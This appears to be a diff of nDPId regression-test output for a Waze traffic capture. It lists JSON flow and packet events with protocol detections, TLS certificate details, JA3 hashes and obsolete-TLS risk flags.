{"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871918,"flow_last_seen":1435587872568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871939,"flow_last_seen":1435587872569,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587872569,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":175,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871935,"flow_last_seen":1435587872515,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872515,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871918,"flow_last_seen":1435587872568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871939,"flow_last_seen":1435587872569,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587872569,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587872702,"flow_last_seen":1435587872702,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587872702,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1435587872702,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587872702,"pkt":"ABoRAAACABoRAAABCABFAAA8Y6lAAEAGsncKCAABNubjrLHyAFAC8Q4\/AAAAAKAC\/\/\/yUgAAAgQFtAQCCAoACG2WAAAAAAEDAwg="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1435587872704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872704,"pkt":"ABoRAAACABoRAAABCABFAAAodMpAABAG0Wo25uOsCggAAQBQsfL9DvHAAvEOQFAS\/\/\/Y8wAA"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1435587872705,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872705,"pkt":"ABoRAAACABoRAAABCABFAAAoY6pAAEAGsooKCAABNubjrLHyAFAC8Q5A\/Q7xwVAQ\/\/\/Y9AAA"} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":247,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871929,"flow_last_seen":1435587873486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587873486,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01235{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":249,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871935,"flow_last_seen":1435587873688,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873688,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} -01235{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871929,"flow_last_seen":1435587873741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873741,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} -01236{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587871918,"flow_last_seen":1435587874033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1435587874033,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":247,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871929,"flow_last_seen":1435587873486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587873486,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01235{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":249,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871935,"flow_last_seen":1435587873688,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873688,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} +01235{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871929,"flow_last_seen":1435587873741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873741,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} +01236{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587871918,"flow_last_seen":1435587874033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1435587874033,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587878215,"flow_last_seen":1435587878215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587878215,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1435587878215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587878215,"pkt":"ABoRAAACABoRAAABCABFAAA8EZdAAEAGeDAKCAABNBFy25htAbtopH5VAAAAAKAC\/\/+mHQAAAgQFtAQCCAoACG\/CAAAAAAEDAwg="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1435587878217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878217,"pkt":"ABoRAAACABoRAAABCABFAAAodRhAABAGRMM0EXLbCggAAQG7mG2XW4GqaKR+VlAS\/\/9ktAAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1435587878217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878217,"pkt":"ABoRAAACABoRAAABCABFAAAoEZhAAEAGeEMKCAABNBFy25htAbtopH5Wl1uBq1AQ\/\/9ktQAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878215,"flow_last_seen":1435587878444,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878444,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878215,"flow_last_seen":1435587878444,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878444,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587878606,"flow_last_seen":1435587878606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587878606,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1435587878606,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587878606,"pkt":"ABoRAAACABoRAAABCABFAAA8DkFAAEAGt5sKCAABsCK6tI3YAbvsnGGoAAAAAKAC\/\/+FVQAAAgQFtAQCCAoACG\/pAAAAAAEDAwg="} 